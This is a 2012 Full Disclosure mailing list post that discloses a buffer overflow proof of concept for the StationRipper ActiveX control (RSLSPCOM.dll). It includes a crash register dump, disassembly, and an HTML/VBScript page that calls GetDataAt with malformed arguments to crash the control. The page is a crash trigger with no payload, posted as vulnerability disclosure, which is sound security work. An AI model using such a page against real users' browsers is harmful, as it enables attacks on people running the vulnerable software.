Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

stationripper ActiveX (RSLSPCOM.dll) BoF PoC

From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Thu, 19 Jul 2012 11:22:57 -0700
Exploit Title: stationripper ActiveX (RSLSPCOM.dll) BoF PoC
Date: July 19, 2012
Author: coolkaveh
coolkaveh () rocketmail com
Https://twitter.com/coolkaveh
Vendor Homepage: www.stationripper.com
Version: 2.98.3/1
Tested on: windows XP SP3

---------------------------------------------------------------------------------------
cheers to awesome hippie flaw hunter
---------------------------------------------------------------------------------------
Class SSLDataContainer
GUID: {E52990C2-7CED-4756-9B3B-6188A5B41704}
GetDataAt
Function GetDataAt (
        ByVal lPos  As Long ,
        ByVal lHowMuch  As Long
)  As String

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EIP 003B1191
EAX 00000000
EBX 003BB3BC -> 003B3904
ECX 003D2120 -> BAADF00D
EDX 00000000
EDI FFFFFFFF
ESI 00000000
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED64 -> 003BB3BC


Block Disassembly:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3B1181  MOV DL,AL
3B1183  AND DL,F
3B1186  SHL DL,2
3B1189  OR [EBP+13],DL
3B118C  SHR AL,4
3B118F  MOV DL,AL
3B1191  MOV AL,[EDI]      <--- CRASH
3B1193  MOV BL,AL
3B1195  AND BL,3
3B1198  SHL BL,4
3B119B  OR DL,BL
3B119D  SHR AL,2
3B11A0  MOV [EBP+F],AL
3B11A3  MOV EAX,[EBP-4]
3B11A6  SUB [EBP-8],EAX


ArgDump:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EBP+8   003D2120 -> BAADF00D
EBP+12  FFFFFFFF
EBP+16  00000001
EBP+20  00000005
EBP+24  00000001
EBP+28  00000000

<html>
Exploit
<object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Ratajik Software\StationRipper\RSLSPCOM.dll"
prototype  = "Function GetDataAt ( ByVal lPos As Long ,  ByVal
lHowMuch As Long ) As String"
memberName = "GetDataAt"
progid     = "SSLHIJACKCLIENTCOMLib.SSLDataContainer"
argCount   = 2

arg1=-1
arg2=1

xpl.GetDataAt arg1 ,arg2

</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: